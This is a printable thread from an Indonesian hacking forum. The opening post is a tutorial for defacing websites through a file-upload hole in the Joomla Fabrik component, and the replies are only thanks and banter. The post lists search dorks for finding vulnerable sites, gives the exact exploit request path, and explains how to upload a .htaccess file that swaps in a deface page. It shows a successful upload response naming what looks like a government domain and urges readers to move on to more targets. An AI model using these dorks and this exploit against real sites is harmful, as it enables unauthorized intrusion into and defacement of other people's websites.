Share [NEW] Deface Web On CSRF 2018 DORK - Printable Version +- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum) +-- Forum: Attacker Zone (https://www.indonesianbacktrack.or.id/forum/forum-169.html) +--- Forum: Web Attack (https://www.indonesianbacktrack.or.id/forum/forum-181.html) +--- Thread: Share [NEW] Deface Web On CSRF 2018 DORK (/thread-7103.html) |
[NEW] Deface Web On CSRF 2018 DORK - bl4ck0wl - 03-12-2018 [b]By:Blackowl Thanks TO http://www.indonesianbacktrack.or.id Deface Web On CSRF 2018 Method CSRF........ =============[/b] DORK ============= inurl:index.php?option=com_fabrik inurl:index.php/component/fabrik/ site:com inurl:index.php?option=com_fabrik&view= site:com inurl:importcsv.php site:com (Di kembangin ajah ) ============== ALAT & BAHAN ============== Csrf Com_Fabrik KLIK me File .htaccess Touch Me beb Script Deface HTML sendiri Exploit /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload ================================== LIVE TARGET : http://xxxxx.xyz ================================== Toturial ./Nocturnal-start 1) Dorking Seperti Biasa cari site yang kira kira vuln 2) Kalau dah dapet masukan exploit nya contoh "http://xxxxx.xyz/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload" Kalau Vuln muncul tulisan seperti ini 3) Selanju nya kita edit script csrf nya untuk mengupload file htaccess nya Edit Yang Bagian Ini saja http://site.com ganti dengan site yang mau di eksekusi ya :v Kalau Udah di edit jangan lupa save ya :v 4) Selanjut nya Edit File htaccess nya Edit Di Bagian "DirectoryIndex frogs.html" frogs.html ganti dengan nama scrip deface kalian Kalau sudah selesai ngedit nya buka csrf nya 5) Upload File .htaccess Nya dulu kalau berhasil ada tulisan kayak gini {"filepath":"\/.htaccess","uri":"http:\/\/pn-maros.go.id\/.htaccess"} Kalau udah berhasil UP flie htaccess nya langsung saja up script deface kalian Kalau Dah Selesai Up .htaccess Dan Script Nya langsung aja cek web nya kalau gak ke deface ya cari web lagi jangan putus asa By:bl4ck0wl RE: [NEW] Deface Web On CSRF 2018 DORK - cyberking - 03-14-2018 (03-12-2018, 12:52 PM)bl4ck0wl Wrote: [b]By:Blackowl keep it up, nice share, btw nakal nih pepes pepes :p RE: [NEW] Deface Web On CSRF 2018 DORK - bl4ck0wl - 03-16-2018 wkwkw RE: [NEW] Deface Web On CSRF 2018 DORK - mend0an - 03-17-2018 Terima kasih suhuu RE: [NEW] Deface Web On CSRF 2018 DORK - vizt3r - 05-16-2018 Yaahh padahal laptop lagi rusak wkwkw, gembok aja deh. Thank you sobat. |